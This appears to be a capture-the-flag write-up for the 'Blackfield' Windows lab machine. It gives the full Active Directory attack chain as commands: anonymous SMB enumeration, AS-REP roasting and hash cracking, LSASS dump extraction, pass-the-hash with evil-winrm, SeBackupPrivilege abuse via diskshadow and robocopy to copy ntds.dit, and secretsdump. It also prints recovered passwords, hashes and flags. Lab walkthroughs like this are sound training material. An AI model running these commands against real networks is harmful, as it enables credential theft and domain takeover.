Difficulty: Hard (Windows)
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local)
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0
Service Info: Host: DC01; OS: Windows
Ports 88, 389, and 445 confirm a Windows Domain Controller running Active Directory. Port 5985 exposes WinRM for remote management. The domain name BLACKFIELD.local and hostname DC01 are identified from the LDAP banner.
smbclient //10.129.8.195/profiles$ -U ''
An anonymous (null session) connection to the profiles$ share reveals over 300 directories, each corresponding to a domain user account. These names are harvested into users.txt for targeted enumeration.
AS-REP Roasting targets accounts with Kerberos pre-authentication disabled (DONT_REQ_PREAUTH). Using the harvested users.txt list:
GetNPUsers.py BLACKFIELD.local/ -userfile users.txt -format hashcat -dc-ip 10.129.8.195
The account support is found to be vulnerable, returning a crackable AS-REP hash.
hashcat -m 18200 support.hash /usr/share/wordlists/rockyou.txt
Result: support : #00^BlackKnight
Authenticating to SMB with the support credentials reveals access to the forensic share. Inside \memory_analysis\, an LSASS process dump archive is discovered:
smbclient //10.129.8.195/forensic -U 'support%#00^BlackKnight'
smb: \memory_analysis\> get lsass.zip
The dump is analyzed locally using pypykatz to extract credential secrets:
pypykatz lsa minidump lsass.DMP
Multiple NT hashes are recovered, including two high-value accounts:
svc_backup: 9658d1d1dcd9250115e2205d9f48400dAdministrator: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62 (account disabled for direct login)Using the svc_backup NT hash, we authenticate via Evil-WinRM using Pass-the-Hash (PtH):
evil-winrm -i 10.129.8.195 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
Checking privileges reveals SeBackupPrivilege and SeRestorePrivilege:
whoami /priv
These privileges allow reading any file on the system, bypassing NTFS ACLs entirely. The objective is to extract the Active Directory database, ntds.dit. Because the file is locked by the system, Volume Shadow Copy (VSS) is leveraged through diskshadow.
diskshadow.txt:
set context persistent nowriters
add volume c: alias scripta
create
expose %scripta% z:
Execution and extraction:
diskshadow /s diskshadow.txt
robocopy /b Z:\Windows\NTDS\ C:\Temp\ ntds.dit
reg save hklm\system C:\Temp\system.bak
Note:
robocopy /buses Backup semantics, which relies onSeBackupPrivilegeto bypass ACL restrictions — no shell tricks required.
After downloading both files to the attack machine, all domain hashes are extracted using secretsdump.py:
impacket-secretsdump -ntds ntds.dit -system system.bak LOCAL
Result: Administrator:500:aad3...:184fb5e5178480be64824d4cd53b99ee
Login via Pass-the-Hash as Domain Administrator:
evil-winrm -i 10.129.8.195 -u administrator -H 184fb5e5178480be64824d4cd53b99ee
| Flag | Hash |
|---|---|
| User | 3920bb317a0bef51027e2852be64b543 |
| Root | 4375a629c7c67c8e29db269060c955cb |
Nmap → Domain Controller (BLACKFIELD.local) on standard AD ports
→ Anonymous SMB on profiles$ (User Enumeration)
→ AS-REP Roasting (support) → Cracked Password (#00^BlackKnight)
→ SMB access to forensic share → Found lsass.zip (Memory Dump)
→ Extracted svc_backup NT Hash via pypykatz
→ WinRM (PtH as svc_backup) → SeBackupPrivilege Abuse (Diskshadow + Robocopy)
→ Extracted ntds.dit → Dumped Domain Admin Hash → WinRM (PtH as Admin) → Root